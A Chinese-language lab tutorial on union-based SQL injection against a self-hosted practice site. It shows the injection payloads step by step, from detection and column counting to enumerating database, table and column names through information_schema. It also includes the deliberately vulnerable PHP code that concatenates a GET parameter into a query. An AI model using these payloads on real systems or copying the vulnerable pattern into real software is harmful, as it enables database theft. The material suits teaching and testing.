sql注入实战—union注入

测试网站：自建靶场 http://192.168.57.128:1237/sql/union.php?id=1
测试工具：Burp Suite

1.注入过程。

1.1 访问该地址使用burp抓包，返回的结果如下。

1.2 在URL后添加一个单引号，再次访问，返回的结果与id=1不相同。

1.3 继续修改URL，访问id=1 and 1=1，由于and 1=1为真，所以页面应返回与id=1相同的结果，访问id=1 and 1=2，由于and 1=2为假，所以页面应返回与id=1不同的结果，如下图所示。

  由以上返回的信息我们可以判断此站点存在sql注入漏洞。

1.4 继续使用order by 1-99语句查询该数据库的字段数量，可以理解为order by=1-99，如访问id=1 order by 3，页面返回与id=1的结果相同，访问id=1 order by 4，页面返回与id=1结果不同，则字段数为3，如下图所示：

1.5 在数据库中查询ID对应的内容，然后将数据库的内容输出到页面，由于是将数据输出到页面上的，所以可以使用union注入，且通过order by查询结果，得到字段数为3，所以union注入的语句如下所示：

union select 1,2,3

  因为代码只返回第一条结果，所以union select获取的结果没有输出的页面。此时可以将id的值设置为-1，这样数据库中没有id=-1的数据，所以会返回union select的结果，如下所示：

1.6 返回的结果是2:3，意味着union select 1,2,3中，2和3的位置可以输入Mysql语句。我们尝试查询当前数据库名，访问语句构造如下：

id = 1 union select 1,database(),3

  测试结果如下图：

1.7 得知数据库名字之后，继续查询表名。语句构造如下：

select table_name from information_schema.tables where table_schema='security' limit 0,1;

  在2的位置加括号后复制以上语句，结果如下所示：

1.8 得知表名继续查询字段名，以以上emails表名为例，构造如下语句：

select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1;

1.9 当获取了库名、表名和字段名时，就可以构造SQL语句查询数据库的数据，例如查询字段email_id对应的数据，构造的SQL语句如下所示。

select email_id from security.emails limit 0,1;

2.Union注入代码分析。

<?php
    $con=mysqli_connect("192.168.57.128","root","123","security");
    if (mysqli_connect_errno())
    {
        echo "连接失败: " . mysqli_connect_error();
    }
    $id = $_GET['id'];
    $result = mysqli_query($con,"select * from users where `id`=".$id);
    $row = mysqli_fetch_array($result);
    echo $row['username'] . " : " . $row['password'];
    echo "<br>";
    ?>

  以上程序通过GET参数ID，将ID拼接到SQL语句中，在数据中查询参数ID对应的内容，然后将第一条查询结果中的username和password输出到页面上的，所以可以利用union语句查询其他数据。
  此时SQL语句可以分为select * from users where ‘id’ = 1和union select 1,2,3两条，利用第二条语句（union查询)就可以获取数据库中的内容。